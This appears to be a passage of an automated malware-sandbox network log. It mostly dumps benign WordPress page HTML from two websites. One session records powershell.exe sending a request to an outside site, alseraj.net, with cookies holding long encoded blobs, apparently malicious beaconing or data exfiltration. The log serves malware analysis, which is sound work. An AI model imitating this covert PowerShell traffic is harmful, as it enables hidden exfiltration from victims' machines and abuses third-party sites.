                                                    Date: Wed, 18 Dec 2024 10:19:37 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Vary: Accept-Encoding
                                                    Vary: Accept-Encoding
                                                    Vary: Accept-Encoding
                                                    Vary: Accept-Encoding,Cookie
                                                    Link: <https://skagitorganics.net/wp-json/>; rel="https://api.w.org/"
                                                    Link: <https://skagitorganics.net/wp-json/wp/v2/pages/1194>; rel="alternate"; title="JSON"; type="application/json"
                                                    Link: <https://wp.me/PcRIbW-jg>; rel=shortlink
                                                    X-Powered-By: WP Engine
                                                    X-Cacheable: SHORT
                                                    Cache-Control: max-age=600, must-revalidate
                                                    X-Cache: HIT: 3
                                                    X-Cache-Group: normal
                                                    CF-Cache-Status: DYNAMIC
                                                    Set-Cookie: __cf_bm=kCL2MeDCp_JG_jFwYnzrmSoGZuwjw9w45l0S7K2bc1E-1734517177-1.0.1.1-tdEfTwyiBqrIqHEIAXGr7wLjH0Cr0WRh.WMmTTeaY5nE98nd3uvQGmm71_4SbnL.cb2S2LEaANDOo.oNp7q1Gw; path=/; expires=Wed, 18-Dec-24 10:49:37 GMT; domain=.skagitorganics.net; HttpOnly; Secure; SameSite=None
                                                    Server: cloudflare
                                                    CF-RAY: 8f3e6a642ec4ed80-ATL
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-12-18 10:19:37 UTC378INData Raw: 37 62 64 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 6b 61 67 69 74 6f 72 67 61 6e 69 63 73 2e 6e 65 74 2f 78 6d 6c 72 70 63 2e 70 68 70 22 3e 0d 0a 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 69 6e 64 65 78 2c
                                                    Data Ascii: 7bd2<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="pingback" href="https://skagitorganics.net/xmlrpc.php"><meta name='robots' content='index,
                                                    2024-12-18 10:19:37 UTC1369INData Raw: 20 70 6c 75 67 69 6e 20 76 31 39 2e 33 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e 57 61 73 68 69 6e 67 74 6f 6e 26 23 30 33 39 3b 73 20 42 65 73 74 20 52 53 4f 20 2d 20 43 61 6e 6e 61 62 69 73 20 43 6f 6d 6d 75 6e 69 74 79 20 43 6f 6e 6e 65 63 74 69 6f 6e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 57 61 73 68 69 6e 67 74 6f 6e 26 23 30 33 39 3b 73 20 42 65 73 74 20 52 53 4f 20 61 6e 64 20 6c 65 61 64 69 6e 67 20 70 72 6f 76 69 64 65 72 20 6f 66 20 70 65 73 74 69 63 69 64 65 2d 66 72 65 65 20 44 4f 48 2d 63 6f 6d 70 6c 69 61 6e 74 20 6d 65 64 69
                                                    Data Ascii: plugin v19.3 - https://yoast.com/wordpress/plugins/seo/ --><title>Washington&#039;s Best RSO - Cannabis Community Connection</title><meta name="description" content="Washington&#039;s Best RSO and leading provider of pesticide-free DOH-compliant medi
                                                    2024-12-18 10:19:37 UTC1369INData Raw: 22 73 75 6d 6d 61 72 79 5f 6c 61 72 67 65 5f 69 6d 61 67 65 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 6c 61 62 65 6c 31 22 20 63 6f 6e 74 65 6e 74 3d 22 45 73 74 2e 20 72 65 61 64 69 6e 67 20 74 69 6d 65 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 64 61 74 61 31 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 6d 69 6e 75 74 65 73 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 57 65 62
                                                    Data Ascii: "summary_large_image" /><meta name="twitter:label1" content="Est. reading time" /><meta name="twitter:data1" content="3 minutes" /><script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"Web
                                                    2024-12-18 10:19:37 UTC1369INData Raw: 34 2d 30 34 2d 31 38 54 32 30 3a 32 36 3a 34 30 2b 30 30 3a 30 30 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 57 61 73 68 69 6e 67 74 6f 6e 27 73 20 42 65 73 74 20 52 53 4f 20 61 6e 64 20 6c 65 61 64 69 6e 67 20 70 72 6f 76 69 64 65 72 20 6f 66 20 70 65 73 74 69 63 69 64 65 2d 66 72 65 65 20 44 4f 48 2d 63 6f 6d 70 6c 69 61 6e 74 20 6d 65 64 69 63 61 6c 2d 67 72 61 64 65 20 63 61 6e 6e 61 62 69 73 20 63 6f 6e 63 65 6e 74 72 61 74 65 73 2c 20 66 6c 6f 77 65 72 2c 20 65 64 69 62 6c 65 73 2c 20 61 6e 64 20 74 6f 70 69 63 61 6c 73 2e 22 2c 22 62 72 65 61 64 63 72 75 6d 62 22 3a 7b 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 73 6b 61 67 69 74 6f 72 67 61 6e 69 63 73 2e 6e 65 74 2f 23 62 72 65 61 64 63 72 75 6d 62 22 7d 2c 22 69 6e 4c 61 6e 67 75 61 67
                                                    Data Ascii: 4-04-18T20:26:40+00:00","description":"Washington's Best RSO and leading provider of pesticide-free DOH-compliant medical-grade cannabis concentrates, flower, edibles, and topicals.","breadcrumb":{"@id":"https://skagitorganics.net/#breadcrumb"},"inLanguag
                                                    2024-12-18 10:19:37 UTC1369INData Raw: 73 20 62 79 20 45 78 61 63 74 4d 65 74 72 69 63 73 20 70 6c 75 67 69 6e 20 76 37 2e 31 39 20 2d 20 55 73 69 6e 67 20 41 6e 61 6c 79 74 69 63 73 20 74 72 61 63 6b 69 6e 67 20 2d 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 65 78 61 63 74 6d 65 74 72 69 63 73 2e 63 6f 6d 2f 20 2d 2d 3e 0a 09 09 3c 21 2d 2d 20 4e 6f 74 65 3a 20 45 78 61 63 74 4d 65 74 72 69 63 73 20 69 73 20 6e 6f 74 20 63 75 72 72 65 6e 74 6c 79 20 63 6f 6e 66 69 67 75 72 65 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 20 54 68 65 20 73 69 74 65 20 6f 77 6e 65 72 20 6e 65 65 64 73 20 74 6f 20 61 75 74 68 65 6e 74 69 63 61 74 65 20 77 69 74 68 20 47 6f 6f 67 6c 65 20 41 6e 61 6c 79 74 69 63 73 20 69 6e 20 74 68 65 20 45 78 61 63 74 4d 65 74 72 69 63 73 20 73 65 74 74 69 6e 67 73 20 70 61 6e 65 6c
                                                    Data Ascii: s by ExactMetrics plugin v7.19 - Using Analytics tracking - https://www.exactmetrics.com/ -->... Note: ExactMetrics is not currently configured on this site. The site owner needs to authenticate with Google Analytics in the ExactMetrics settings panel
                                                    2024-12-18 10:19:37 UTC1369INData Raw: 2c 22 5c 75 64 38 33 63 5c 75 64 64 66 61 5c 75 64 38 33 63 5c 75 64 64 66 33 22 2c 22 5c 75 64 38 33 63 5c 75 64 64 66 61 5c 75 32 30 30 62 5c 75 64 38 33 63 5c 75 64 64 66 33 22 29 26 26 21 6e 28 65 2c 22 5c 75 64 38 33 63 5c 75 64 66 66 34 5c 75 64 62 34 30 5c 75 64 63 36 37 5c 75 64 62 34 30 5c 75 64 63 36 32 5c 75 64 62 34 30 5c 75 64 63 36 35 5c 75 64 62 34 30 5c 75 64 63 36 65 5c 75 64 62 34 30 5c 75 64 63 36 37 5c 75 64 62 34 30 5c 75 64 63 37 66 22 2c 22 5c 75 64 38 33 63 5c 75 64 66 66 34 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 37 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 32 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 35 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 65 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64
                                                    Data Ascii: ,"\ud83c\uddfa\ud83c\uddf3","\ud83c\uddfa\u200b\ud83c\uddf3")&&!n(e,"\ud83c\udff4\udb40\udc67\udb40\udc62\udb40\udc65\udb40\udc6e\udb40\udc67\udb40\udc7f","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\ud
                                                    2024-12-18 10:19:37 UTC1369INData Raw: 61 72 20 65 3d 22 70 6f 73 74 4d 65 73 73 61 67 65 28 22 2b 66 2e 74 6f 53 74 72 69 6e 67 28 29 2b 22 28 22 2b 5b 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 73 29 2c 75 2e 74 6f 53 74 72 69 6e 67 28 29 2c 70 2e 74 6f 53 74 72 69 6e 67 28 29 5d 2e 6a 6f 69 6e 28 22 2c 22 29 2b 22 29 29 3b 22 2c 72 3d 6e 65 77 20 42 6c 6f 62 28 5b 65 5d 2c 7b 74 79 70 65 3a 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 7d 29 2c 61 3d 6e 65 77 20 57 6f 72 6b 65 72 28 55 52 4c 2e 63 72 65 61 74 65 4f 62 6a 65 63 74 55 52 4c 28 72 29 2c 7b 6e 61 6d 65 3a 22 77 70 54 65 73 74 45 6d 6f 6a 69 53 75 70 70 6f 72 74 73 22 7d 29 3b 72 65 74 75 72 6e 20 76 6f 69 64 28 61 2e 6f 6e 6d 65 73 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61
                                                    Data Ascii: ar e="postMessage("+f.toString()+"("+[JSON.stringify(s),u.toString(),p.toString()].join(",")+"));",r=new Blob([e],{type:"text/javascript"}),a=new Worker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a
                                                    2024-12-18 10:19:37 UTC1369INData Raw: 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 68 65 69 67 68 74 3a 20 31 65 6d 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 77 69 64 74 68 3a 20 31 65 6d 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 6d 61 72 67 69 6e 3a 20 30 20 30 2e 30 37 65 6d 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 2d 30 2e 31 65 6d 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 70 61 64 64 69 6e 67 3a 20 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 7d 0a 3c 2f 73 74 79 6c 65 3e
                                                    Data Ascii: important;border: none !important;box-shadow: none !important;height: 1em !important;width: 1em !important;margin: 0 0.07em !important;vertical-align: -0.1em !important;background: none !important;padding: 0 !important;}</style>
                                                    2024-12-18 10:19:37 UTC1369INData Raw: 62 6c 6f 63 6b 2d 70 75 6c 6c 71 75 6f 74 65 20 63 69 74 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 70 75 6c 6c 71 75 6f 74 65 20 66 6f 6f 74 65 72 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 70 75 6c 6c 71 75 6f 74 65 5f 5f 63 69 74 61 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 31 32 35 65 6d 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 75 70 70 65 72 63 61 73 65 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 7b 62 6f 72 64 65 72 2d 6c 65 66 74 3a 2e 32 35 65 6d 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 37 35 65 6d 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 20 63 69 74 65 2c 2e
                                                    Data Ascii: block-pullquote cite,.wp-block-pullquote footer,.wp-block-pullquote__citation{color:currentColor;font-size:.8125em;font-style:normal;text-transform:uppercase}.wp-block-quote{border-left:.25em solid;margin:0 0 1.75em;padding-left:1em}.wp-block-quote cite,.
                                                    2024-12-18 10:19:37 UTC1369INData Raw: 6f 6e 29 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 68 65 6d 65 20 2e 77 70 2d 62 6c 6f 63 6b 2d 74 61 62 6c 65 20 3a 77 68 65 72 65 28 66 69 67 63 61 70 74 69 6f 6e 29 7b 63 6f 6c 6f 72 3a 23 66 66 66 66 66 66 61 36 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 76 69 64 65 6f 20 3a 77 68 65 72 65 28 66 69 67 63 61 70 74 69 6f 6e 29 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 68 65 6d 65 20 2e 77 70 2d 62 6c 6f 63 6b 2d 76 69 64 65 6f 20 3a 77 68 65 72 65 28 66 69 67 63 61 70 74 69 6f 6e 29 7b 63 6f 6c 6f 72 3a 23 66 66 66 66 66
                                                    Data Ascii: on){color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-table :where(figcaption){color:#ffffffa6}.wp-block-video :where(figcaption){color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-video :where(figcaption){color:#fffff


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    13192.168.11.2049727104.21.10.2244431972C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-12-18 10:19:48 UTC2254OUTGET / HTTP/1.1
                                                    Cookie: EAD88BCF93=8DytH4sIAAAAAAAEAI2UbW+bMBDHv4p5t0kTCk2GuuWVAybxhAHZkLQTMsoSr0PiSUDWVuLDzyZhIUqV9gUI3/3u8N39bei6EUOUBdR3sIu49T0O6vKp3ub2tt12GgwCG4ZQ2aNG1E0M6/bPoY5hVSkgpuU2T4unTrPKPC+LU6yTZqIZ5QK9IT4yx8VbEZ9e7s3PV2GgN98K3piz6d27v/NJEIWIepAgvjEm5iyZTPtErBI7Fb1Ji3353MTNa9OKfHoX7/K9Ll5Ep9l1+lfUquAxxwbu6G7iM9ZpK58gm+K1aulxFcBwxS+62Gmub0H3vR675W6bKXbpe3JWa0R5HJ8r8CKyQDTxnUQO0UKM+ZRxw+w0vxD9jq4SDw6JMH6qJvHCTlNbRA8h12Wz5jp6QHN9AcO5bhF7rq8XTL2k7QdTj/zYMEe9VnOdMEtigStzDJtIILVWOERWGFHEIbHN2diLbeSF2MGyGly0IjNnwJFayl6BCUi5Fxkwvt4D1oqqkgIDxvQLWIrikBaix8epXLRGLjfHJorWmGHf49/EZC8dZ01fSfymZi/dtwT6n3xbjdIdLVxsnYcRHH5l6a7TjjIaJjWsaVm2I7F1WohIcFsicSjySoIf5NS5t30CsTc6DmdjQn1IsLccboZLpj9Fg4qVYXSBXEr8WRaQ1hel/EQsQR5cuChhj4xAjxtKihuCOUl3ddmUv1twooExAbKR/wCKrk1jqAQAAO2nDg==; EAD88BCF931=8DytH4sIAAAAAAAEAGVQy26DMBD8lfIDOVW9E4c2HBAoThoplwqZBbbxS15DQOLja4c0PVQcmN2Z8eyuMLo35JdEkCMKP98qo5ekkXLtNze1JDBZaRy4JWmN9o0bVy5vJCwJdu3ETjkHN6J41FkRWO1BMrvfsYqP4q8Ggff6u8cv+jVJqmN8Acq4+YUZZR0QYRylbNsgYRLF9WgOQ+xoSK3d5B+Mbc6on8nW3MBRD1IuSRX8oH3twxv [TRUNCATED]
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                    Host: alseraj.net
                                                    Connection: Close
                                                    2024-12-18 10:19:49 UTC842INHTTP/1.1 200 OK
                                                    Date: Wed, 18 Dec 2024 10:19:49 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Last-Modified: Wed, 18 Dec 2024 09:38:26 GMT
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0hnCIG%2FNmEpoHcvZhca%2BGP8yis10dFH%2BpiqFEKc6BR4ML%2FTDw7pgNwmNRH5CPmLvdVxRcCNHwNrw5xqA0T6v1b8%2BasvRoDAhAJmjpvylH1IIX764wMGXamv4%2FhmgIA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8f3e6aae6a7edd1a-ATL
                                                    alt-svc: h3=":443"; ma=86400
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=141301&min_rtt=141235&rtt_var=29893&sent=6&recv=9&lost=0&retrans=0&sent_bytes=2827&recv_bytes=2873&delivery_rate=27074&cwnd=252&unsent_bytes=0&cid=56e053057a30d8fa&ts=891&x=0"
                                                    2024-12-18 10:19:49 UTC527INData Raw: 37 64 33 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 72 74 6c 22 20 6c 61 6e 67 3d 22 61 72 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0a 09 09 3c 73 74 79 6c 65 3e 69 6d 67 3a 69 73 28 5b 73 69 7a 65
                                                    Data Ascii: 7d32<!DOCTYPE html><html dir="rtl" lang="ar" prefix="og: https://ogp.me/ns#"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"> <style>img:is([size
                                                    2024-12-18 10:19:49 UTC1369INData Raw: 84 d9 87 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 d8 b4 d8 a8 d9 83 d8 a9 20 d8 a7 d9 84 d8 b3 d8 b1 d8 a7 d8 ac 20 d9 81 d9 8a 20 d8 a7 d9 84 d8 b7 d8 b1 d9 8a d9 82 20 d8 a7 d9 84 d9 89 20 d8 a7 d9 84 d9 84 d9 87 d8 9b 20 d9 85 d9 88 d9 82 d8 b9 20 d8 ab d9 82 d8 a7 d9 81 d9 8a d8 8c 20 d8 a5 d8 b9 d9 84 d8 a7 d9 85 d9 8a 20 d9 88 d8 aa d8 a8 d9 84 d9 8a d8 ba d9 8a d8 8c 20 d9 8a d9 87 d8 af d9 81 20 d9 84 d9 86 d8 b4 d8 b1 20 d9 85 d8 b9 d8 a7 d8 b1 d9 81 20 d8 a7 d9 84 d8 a5 d8 b3 d9 84 d8 a7 d9 85 20 d8 a7 d9 84 d9 85 d8 ad d9 85 d9 91 d8 af d9 8a 20 d9 88 d8 aa d8 b1 d9 88 d9 8a d8 ac 20 d8 a7 d9 84 d8 ab d9 91 d9 82 d8 a7 d9 81 d8 a9 20 d8 a7 d9 84 d8 af d9 91
                                                    Data Ascii: </title><meta name="description" content="
                                                    2024-12-18 10:19:49 UTC1369INData Raw: a9 20 d8 a7 d9 84 d8 b3 d8 b1 d8 a7 d8 ac 22 20 2f 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 70 64 61 74 65 64 5f 74 69 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 32 30 32 34 2d 31 32 2d 31 38 54 31 30 3a 32 36 3a 32 37 2b 30 33 3a 30 30 22 20 2f 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 61 6c 73 65 72 61 6a 2e 6e 65 74 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 33 2f 30 31 2f 61 6c 73 65 72 61 6a 2e 6a 70 67 22 20 2f 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65 3a 73 65 63 75 72 65 5f 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 61 6c 73 65 72 61 6a 2e 6e 65 74 2f
                                                    Data Ascii: " /><meta property="og:updated_time" content="2024-12-18T10:26:27+03:00" /><meta property="og:image" content="https://alseraj.net/wp-content/uploads/2023/01/alseraj.jpg" /><meta property="og:image:secure_url" content="https://alseraj.net/
                                                    2024-12-18 10:19:49 UTC1369INData Raw: 61 6a 2e 6e 65 74 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 33 2f 30 31 2f 61 6c 73 65 72 61 6a 2e 6a 70 67 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 6c 61 62 65 6c 31 22 20 63 6f 6e 74 65 6e 74 3d 22 d9 83 d9 8f d8 aa d8 a8 20 d8 a8 d9 88 d8 a7 d8 b3 d8 b7 d8 a9 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 64 61 74 61 31 22 20 63 6f 6e 74 65 6e 74 3d 22 73 65 72 61 64 6f 74 74 69 6e 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 6c 61 62 65 6c 32 22 20 63 6f 6e 74 65 6e 74 3d 22 d9 85 d8 af d8 a9 20 d8 a7 d9 84 d9 82 d8 b1 d8 a7 d8 a1 d8 a9 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 64 61 74 61 32 22 20 63
                                                    Data Ascii: aj.net/wp-content/uploads/2023/01/alseraj.jpg" /><meta name="twitter:label1" content=" " /><meta name="twitter:data1" content="seradottin" /><meta name="twitter:label2" content=" " /><meta name="twitter:data2" c
                                                    2024-12-18 10:19:49 UTC1369INData Raw: 32 38 5c 75 30 36 34 33 5c 75 30 36 32 39 20 5c 75 30 36 32 37 5c 75 30 36 34 34 5c 75 30 36 33 33 5c 75 30 36 33 31 5c 75 30 36 32 37 5c 75 30 36 32 63 22 2c 22 70 75 62 6c 69 73 68 65 72 22 3a 7b 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 61 6c 73 65 72 61 6a 2e 6e 65 74 2f 23 70 65 72 73 6f 6e 22 7d 2c 22 69 6e 4c 61 6e 67 75 61 67 65 22 3a 22 61 72 22 2c 22 70 6f 74 65 6e 74 69 61 6c 41 63 74 69 6f 6e 22 3a 7b 22 40 74 79 70 65 22 3a 22 53 65 61 72 63 68 41 63 74 69 6f 6e 22 2c 22 74 61 72 67 65 74 22 3a 22 68 74 74 70 73 3a 2f 2f 61 6c 73 65 72 61 6a 2e 6e 65 74 2f 3f 73 3d 7b 73 65 61 72 63 68 5f 74 65 72 6d 5f 73 74 72 69 6e 67 7d 22 2c 22 71 75 65 72 79 2d 69 6e 70 75 74 22 3a 22 72 65 71 75 69 72 65 64 20 6e 61 6d 65 3d 73 65 61 72 63 68 5f 74
                                                    Data Ascii: 28\u0643\u0629 \u0627\u0644\u0633\u0631\u0627\u062c","publisher":{"@id":"https://alseraj.net/#person"},"inLanguage":"ar","potentialAction":{"@type":"SearchAction","target":"https://alseraj.net/?s={search_term_string}","query-input":"required name=search_t
                                                    2024-12-18 10:19:49 UTC1369INData Raw: 61 6d 70 3b 64 3d 62 6c 61 6e 6b 26 61 6d 70 3b 72 3d 67 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 73 65 63 75 72 65 2e 67 72 61 76 61 74 61 72 2e 63 6f 6d 2f 61 76 61 74 61 72 2f 66 63 31 32 62 65 39 35 37 63 65 62 39 32 39 32 32 61 32 32 39 64 63 37 61 37 31 63 61 38 30 30 3f 73 3d 39 36 26 61 6d 70 3b 64 3d 62 6c 61 6e 6b 26 61 6d 70 3b 72 3d 67 22 2c 22 63 61 70 74 69 6f 6e 22 3a 22 73 65 72 61 64 6f 74 74 69 6e 22 2c 22 69 6e 4c 61 6e 67 75 61 67 65 22 3a 22 61 72 22 7d 2c 22 73 61 6d 65 41 73 22 3a 5b 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 61 62 69 62 61 6c 6b 61 7a 65 6d 69 2e 63 6f 6d 22 5d 7d 2c 7b 22 68 65 61 64 6c 69 6e 65 22 3a 22 5c 75 30 36 33 34 5c 75 30 36 32 38 5c 75 30 36 34 33 5c 75 30 36 32 39 20 5c 75 30 36 32 37 5c 75 30
                                                    Data Ascii: amp;d=blank&amp;r=g","url":"https://secure.gravatar.com/avatar/fc12be957ceb92922a229dc7a71ca800?s=96&amp;d=blank&amp;r=g","caption":"seradottin","inLanguage":"ar"},"sameAs":["https://www.habibalkazemi.com"]},{"headline":"\u0634\u0628\u0643\u0629 \u0627\u0
                                                    2024-12-18 10:19:49 UTC1369INData Raw: 20 5c 75 30 36 34 38 5c 75 30 36 34 35 5c 75 30 36 32 34 5c 75 30 36 34 34 5c 75 30 36 35 31 5c 75 30 36 34 31 5c 75 30 36 32 37 5c 75 30 36 32 61 20 5c 75 30 36 33 33 5c 75 30 36 34 35 5c 75 30 36 32 37 5c 75 30 36 32 64 5c 75 30 36 32 39 20 5c 75 30 36 32 37 5c 75 30 36 34 34 5c 75 30 36 33 34 5c 75 30 36 35 31 5c 75 30 36 34 61 5c 75 30 36 32 65 20 5c 75 30 36 32 64 5c 75 30 36 32 38 5c 75 30 36 34 61 5c 75 30 36 32 38 20 5c 75 30 36 32 37 5c 75 30 36 34 34 5c 75 30 36 34 33 5c 75 30 36 32 37 5c 75 30 36 33 38 5c 75 30 36 34 35 5c 75 30 36 34 61 2e 22 2c 22 64 61 74 65 50 75 62 6c 69 73 68 65 64 22 3a 22 32 30 32 32 2d 30 32 2d 30 36 54 30 31 3a 34 30 3a 30 31 2b 30 33 3a 30 30 22 2c 22 64 